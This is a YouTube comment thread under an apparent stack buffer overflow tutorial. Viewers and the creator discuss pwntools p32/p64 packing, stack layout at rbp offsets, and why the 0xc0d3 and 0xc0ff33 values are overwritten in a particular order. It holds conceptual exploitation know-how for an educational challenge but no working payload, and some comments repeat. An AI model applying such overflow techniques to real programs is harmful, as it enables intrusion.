So the use of p32() is with regards to the data type (dword = 32bits)? And therefore p64() is with regard to qword? I had always thought that it was with regard to the architecture, 64bit vs 32bit....
I don't know if I understand what you mean. 32bit integers (and other data types) are used in 32bit architectures and 64 in 64bit ones. If you are packing a 32bit integer into its little endian format, you should use p32(). And p64() for 64bit ones.
I understand now. You explained it in a future video that I hadn't watched yet. Yes, p32() and p64() are strictly for how many bits we are using, regardless of the architecture. Thanks!@@RazviOverflow
@@RazviOverflow from what i understand the size buffer is 70 which we can get at rbp-0x70 and we send payload enough 70 byte right? so we not actually overflow it?
@@Ziq0012 How can a variable live within a buffer if it has its own type and allocated memory? What if the code is something like int a; int b; char buff[104]; Do a and b live within buff?
Around 7:50 lies the explanation, it is because writing into memory happens from lower towards higher memory addresses, whereas the stack grows from higher towards lower addresses. Writing into memory happens in the fashion of: rbp-0x70, rbp-0x6F, rbp-0x6E, rbp-0x6D, and so on... so you are first overwriting rbp-0x8 and then rbp-0x4.
I love your way of explaining things, I've been checking several sources for this stuff and so far this is the best for my way of thinking. GG
Thank you Javier. I'm glad my videos could help you :)
Gracias
Awesome, congrats for 100 subscribers ✨
Thank you Jo :)
Thank you so much for the awesome explanation. Very simple and clear to understand. Keep it up!
Thank you :)
wow what an amazing explanation bro
Thank you :) Glad you liked it.
So the use of p32() is with regards to the data type (dword = 32bits)? And therefore p64() is with regard to qword? I had always thought that it was with regard to the architecture, 64bit vs 32bit....
I don't know if I understand what you mean. 32bit integers (and other data types) are used in 32bit architectures and 64 in 64bit ones. If you are packing a 32bit integer into its little endian format, you should use p32(). And p64() for 64bit ones.
I understand now. You explained it in a future video that I hadn't watched yet. Yes, p32() and p64() are strictly for how many bits we are using, regardless of the architecture. Thanks!@@RazviOverflow
Happy to help :) @@christiansanchez4883
Do we actually overflow the buffer ? What I understand is we only send payload that will rewrite until full size of buffer.
How do you know the size of the buffer? What's its size?
@@RazviOverflow from what i understand the size buffer is 70 which we can get at rbp-0x70 and we send payload enough 70 byte right? so we not actually overflow it?
@@Ziq0012 And what about vars _4h and _8h, living at rbp-0x4 and rbp-0x8 respectively? Do they live within the buffer?
@@RazviOverflow yes within the buffer it at bottom of the buffer . rbp > vars_4h >var_8h > scanf input
@@Ziq0012 How can a variable live within a buffer if it has its own type and allocated memory? What if the code is something like int a; int b; char buff[104]; Do a and b live within buff?
why we must put 0xc0d3 first, why not instead 0xc0ff33 first?
Around 7:50 lies the explanation, it is because writing into memory happens from lower towards higher memory addresses, whereas the stack grows from higher towards lower addresses. Writing into memory happens in the fashion of: rbp-0x70, rbp-0x6F, rbp-0x6E, rbp-0x6D, and so on... so you are first overwriting rbp-0x8 and then rbp-0x4.
Please also show the decompiled code in your videos.
There's no need. Besides, which tool do you propose using?
What if I want to edit the values that are placed lower on memory, is there a way to underflow or something?
No, because writing into memory always happens from lower towards higher addresses.
Not me looking for the script to do so 😗
Don't cheat, learn the concepts :)